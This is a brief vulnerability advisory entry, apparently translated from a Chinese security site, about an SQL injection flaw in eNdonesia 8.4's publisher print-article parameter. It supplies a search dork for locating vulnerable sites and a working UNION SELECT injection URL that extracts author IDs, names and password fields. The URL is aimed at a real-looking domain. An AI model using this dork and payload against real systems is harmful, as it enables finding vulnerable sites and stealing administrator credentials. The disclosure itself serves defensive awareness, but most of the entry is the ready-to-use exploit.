eNdonesia 8.4 SQL injection vulnerability-vulnerability warning-the black bar safety net

2010-09-20T00:00:00
ID MYHACK58:62201027903
Type myhack58
Reporter 佚名
Modified 2010-09-20T00:00:00

Description

Dork : mod. php? mod=publisher&op=printarticle&artid=

http://localhost/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i]

Injection test

http://www.myhack58.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors--